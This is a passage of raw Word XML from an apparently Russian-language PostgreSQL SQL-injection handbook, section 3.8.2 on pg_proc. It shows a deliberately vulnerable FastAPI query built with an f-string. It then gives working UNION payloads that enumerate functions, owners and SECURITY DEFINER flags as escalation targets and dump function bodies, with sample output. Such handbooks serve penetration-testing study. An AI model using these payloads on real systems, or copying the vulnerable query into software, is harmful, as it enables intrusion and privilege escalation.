          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> по образцу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">time_based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (строка 70). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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Catalogs — pg_class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Catalogs — pg_namespace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Catalogs — pg_attribute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Object Identifier Types — regclass / regproc / regtype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Information Schema overview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section (db enumeration)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enumeration via pg_catalog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.2 pg_proc — функции, сигнатуры, исходники</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pg_catalog.pg_proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — каталог всех функций кластера (PUBLIC на SELECT). В одной таблице: имя, схема, язык реализации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prolang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pg_language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), owner (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">proowner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тип возврата, типы аргументов, флаг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosecdef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SECURITY DEFINER) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">исходный код</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в колонке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Для plpgsql/plperl/plpython функций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содержит тело функции целиком, для C-функций — имя экспортированного символа в .so. Через UNION-инъекцию атакующий получает: (а) каталог всех функций с их владельцами и флагом SECURITY DEFINER — карту целей для эскалации привилегий (3.13); (б) тело конкретных функций для поиска SQL-инъекций в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format(...)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EXECUTE 'SELECT ...' || ...</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app/api/v1/reports.py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@router.get("/reports")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_reports(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    kind: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f"SELECT id, title, generated_at FROM reports WHERE kind = '{kind}'"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Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Для UNION с метаданными типы приводятся к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proowner::regrole::text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для owner, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prolang::regtype::text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для языка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — каталог функций (сигнатуры, языки, owner-ы, SECURITY DEFINER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `kind`):</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p.oid::int, n.nspname || '.' || p.proname || '(' || pg_get_function_arguments(p.oid) || ')' || CASE WHEN p.prosecdef THEN ' SECURITY DEFINER' ELSE '' END || ' [' || l.lanname || ', owner=' || pg_get_userbyid(p.proowner) || ']', now() FROM pg_proc p JOIN pg_namespace n ON p.pronamespace = n.oid JOIN pg_language l ON p.prolang = l.oid WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')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generated_at FROM reports WHERE kind = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.oid::int,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    n.nspname || '.' || p.proname || '('</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || pg_get_function_arguments(p.oid) || ')'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || CASE WHEN p.prosecdef THEN ' SECURITY DEFINER' ELSE '' END</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || ' [' || l.lanname || ', owner=' || pg_get_userbyid(p.proowner) || ']',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON p.pronamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_language l ON p.prolang = l.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')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title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атакующий получает записи вида:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.refresh_materialized(name text) SECURITY DEFINER [plpgsql, owner=postgres]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.audit_event(actor text, action text, payload jsonb) [plpgsql, owner=appwriter]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">audit.purge_old_events(days integer) SECURITY DEFINER [plpgsql, owner=postgres]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.recalc_balance(uid bigint) [sql, owner=appwriter]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждая строка с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owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — кандидат на 3.13: вызов из application-роли исполняется с правами postgres-superuser. Список языков (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plpgsql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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — fingerprint, какие RCE-векторы из 3.7 применимы в кластере (если стоит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 3.7.3 доступен; если только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plpgsql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE через языки не пройдёт).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_get_function_arguments(oid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — официальная функция, рендерит аргументы в форме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">arg1 text, arg2 integer DEFAULT 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (точно как написано в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Альтернатива через сырой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">proargnames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proargtypes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proargmodes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует ручной склейки и менее читаема.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — тело конкретной функции (`prosrc`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После Payload A атакующий выбрал цель — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.audit_event(actor text, action text, payload jsonb)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Нужно тело, чтобы найти inject-точку или понять, что функция делает (например, не пишет ли она в audit-таблицу, которую атакующий хочет обойти).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `kind`):</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prosrc, now() FROM pg_proc WHERE oid = 'public.audit_event(text, text, jsonb)'::regprocedure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generated_at FROM reports WHERE kind = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, prosrc, now()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE oid = 'public.audit_event(text, text, jsonb)'::regprocedure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title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — полное тело plpgsql-функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="10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EXECUTE format('INSERT INTO %I.events(actor, action, payload, ts) VALUES ($1, $2, $3, now())', current_schema)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        USING actor, action, payload;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN;</w:t>
      </w:r>
    </w:p>
    <w:p>
